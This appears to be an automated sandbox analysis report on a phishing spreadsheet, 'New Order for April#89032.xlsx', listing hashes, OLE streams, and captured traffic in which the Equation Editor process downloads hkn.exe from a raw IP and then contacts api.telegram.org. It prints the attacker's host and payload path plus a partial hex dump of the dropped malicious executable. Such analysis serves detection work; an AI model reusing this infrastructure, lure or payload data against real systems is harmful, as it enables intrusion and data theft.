                                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                      Malicious:true
                                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      C:\Users\Public\vbc.exe
                                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):881152
                                                                                                      Entropy (8bit):7.199964525474944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:cSIIK2eESbfOEauXDylVOhrecPoFe/OIDIUSyBlt+vEHTwzZIKU6ke:cNIVUXXulVSBPo8OIDlJbzyI/
                                                                                                      MD5:5F968F612F82F74C96DD257793CF917D
                                                                                                      SHA1:004213F3E85514317B8A711EDC42A124BE378ADF
                                                                                                      SHA-256:2A0C31DCC49402D53D3907CBD0C79473E20B64AA098ADF71437946E58BD55299
                                                                                                      SHA-512:BAF41C5BC33A3349DFCF1B7A8978F002AB27A243A786BC80362132F757688AA366EE3A48A4CE071B39D9E9FDFAB04E5F204489D6BC23FEA7400CB5C9AABC2051
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.n`..............P..*...F......fI... ...`....@.. ....................................@..................................I..O....`..,B........................................................................... ............... ..H............text...l)... ...*.................. ..`.rsrc...,B...`...D...,..............@..@.reloc...............p..............@..B................HI......H........?...H..........L................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....ol...('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:CDFV2 Encrypted
                                                                                                      Entropy (8bit):7.996699260832285
                                                                                                      TrID:
                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                      File name:New Order for April#89032.xlsx
                                                                                                      File size:2269696
                                                                                                      MD5:d7928e685d37d907d102cecdf3d3ce8b
                                                                                                      SHA1:3404ab865cdfb6c4a71151f5ae7bd17b92206885
                                                                                                      SHA256:a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
                                                                                                      SHA512:280a8eb7c681c72f52f333d5b47fb983c6e5a971682f27e5ec74d7cce23910c8f7a8020e3dcb85e9a4390c5859d206fcaabd6f3d023d523094ea52998cac345a
                                                                                                      SSDEEP:49152:D9jq8xY13JlsDo7RssRoodbu140WsTTmSgCu1E5:xFG3jRFnbS6smrCu1E
                                                                                                      File Content Preview:........................>...................#....................................................................................................................................... ...!..."...#...$...%......................................................

                                                                                                      File Icon

                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                      Static OLE Info

                                                                                                      General

                                                                                                      Document Type:OLE
                                                                                                      Number of OLE Files:1

                                                                                                      OLE File "New Order for April#89032.xlsx"

                                                                                                      Indicators

                                                                                                      Has Summary Info:False
                                                                                                      Application Name:unknown
                                                                                                      Encrypted Document:True
                                                                                                      Contains Word Document Stream:False
                                                                                                      Contains Workbook/Book Stream:False
                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                      Contains Visio Document Stream:False
                                                                                                      Contains ObjectPool Stream:
                                                                                                      Flash Objects Count:
                                                                                                      Contains VBA Macros:False

                                                                                                      Streams

                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                      File Type:data
                                                                                                      Stream Size:64
                                                                                                      Entropy:2.73637206947
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                      File Type:data
                                                                                                      Stream Size:112
                                                                                                      Entropy:2.7597816111
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                      File Type:data
                                                                                                      Stream Size:200
                                                                                                      Entropy:3.13335930328
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                      File Type:data
                                                                                                      Stream Size:76
                                                                                                      Entropy:2.79079600998
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 2247976
                                                                                                      General
                                                                                                      Stream Path:EncryptedPackage
                                                                                                      File Type:data
                                                                                                      Stream Size:2247976
                                                                                                      Entropy:7.9999090543
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:. M " . . . . . . 8 : 2 . j B . . C S . . . . e . ) . a . O * . v , . . \\ [ . . . c . = ) . / X . . . . . X . . L 1 . . b . . . . . . . . . ^ . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . .
                                                                                                      Data Raw:18 4d 22 00 00 00 00 00 06 38 3a 32 d0 6a 42 c2 ac 43 53 19 99 a1 05 65 f9 29 01 61 19 4f 2a 8e 76 2c cf ba 5c 5b e4 fc 15 63 9e 3d 29 dc 2f 58 bd 11 d1 08 e8 58 f3 08 4c 31 c0 2e 62 ad 03 8d 1d e5 e7 96 fc ad 5e b0 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6
                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                      General
                                                                                                      Stream Path:EncryptionInfo
                                                                                                      File Type:data
                                                                                                      Stream Size:224
                                                                                                      Entropy:4.51192910595
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . c . . ? v . . 0 . . . . . . W P . . . . 5 . @ N . { . . . . . 6 . . . k . d . . . . { . . . . . . S ( . [ 5 ] . . } r P ] S .
                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 8, 2021 12:50:31.962682009 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.079775095 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.079906940 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.080419064 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.198482990 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.198522091 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.198553085 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.198596001 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.198673964 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.199275970 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.315244913 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315275908 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315309048 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315332890 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315356016 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315390110 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315411091 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.315428972 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315432072 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.315435886 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.315458059 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.315474033 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.315493107 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.431818008 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.431879997 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.431904078 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.431936979 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.431961060 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.431984901 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432029009 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432071924 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432095051 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432121992 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432147026 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432168961 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432169914 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432199955 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432203054 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432204962 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432271004 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432315111 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432434082 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432459116 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432482958 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432502985 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.432527065 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.432569027 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.440557003 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554275990 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554326057 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554348946 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554371119 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554395914 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554445982 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554471970 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554518938 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554544926 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554584980 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554609060 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554627895 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554641962 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554719925 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554763079 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554778099 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554802895 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554820061 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554825068 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554832935 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554862976 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.554871082 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.554907084 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555037022 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555099010 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555125952 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555155039 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555165052 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555176973 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555187941 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555200100 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555233955 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555248976 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555303097 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555325985 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555344105 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555355072 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555418968 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555459023 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555469990 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555507898 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555516958 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555555105 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555633068 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555670977 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555679083 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555711031 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555711031 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555747986 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555783987 CEST8049167198.23.174.104192.168.2.22
                                                                                                      Apr 8, 2021 12:50:32.555819035 CEST4916780192.168.2.22198.23.174.104
                                                                                                      Apr 8, 2021 12:50:32.555875063 CEST8049167198.23.174.104192.168.2.22

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Apr 8, 2021 12:52:09.397815943 CEST5219753192.168.2.228.8.8.8
                                                                                                      Apr 8, 2021 12:52:09.409843922 CEST53521978.8.8.8192.168.2.22

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                      Apr 8, 2021 12:52:09.397815943 CEST192.168.2.228.8.8.80xd07cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                      Apr 8, 2021 12:52:09.409843922 CEST8.8.8.8192.168.2.220xd07cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 198.23.174.104

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.2249167198.23.174.10480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Apr 8, 2021 12:50:32.080419064 CEST0OUTGET /hkn.exe HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                      Host: 198.23.174.104
                                                                                                      Connection: Keep-Alive
                                                                                                      Apr 8, 2021 12:50:32.198482990 CEST1INHTTP/1.1 200 OK
                                                                                                      Date: Thu, 08 Apr 2021 10:50:31 GMT
                                                                                                      Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
                                                                                                      Last-Modified: Thu, 08 Apr 2021 08:14:53 GMT
                                                                                                      ETag: "d7200-5bf71a458267a"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 881152
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: application/x-msdownload
                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d bb 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2a 0a 00 00 46 03 00 00 00 00 00 66 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 49 0a 00 4f 00 00 00 00 60 0a 00 2c 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 29 0a 00 00 20 00 00 00 2a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 42 03 00 00 60 0a 00 00 44 03 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0d 00 00 02 00 00 00 70 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 49 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 cc 48 00 00 03 00 00 00 01 00 00 06 4c 88 00 00 c8 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 33 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 34 00 00 0a 6f 35 00 00 0a 73 36 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00
                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}n`P*FfI `@ @IO`,B H.textl) * `.rsrc,B`D,@@.relocp@BHIH?HL0(( (o!*("(#($(%(&*N(ol('*&((*s)s*s+s,s-*0~o.+*0~o/+*0~o0+*0~o1+*0~o2+*0<~(3,!rp(4o5s6~+*0~


                                                                                                      HTTPS Packets

                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                      Apr 8, 2021 12:52:09.545206070 CEST149.154.167.220443192.168.2.2249168CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,036f7277af969a6947a61ae0b815907a1
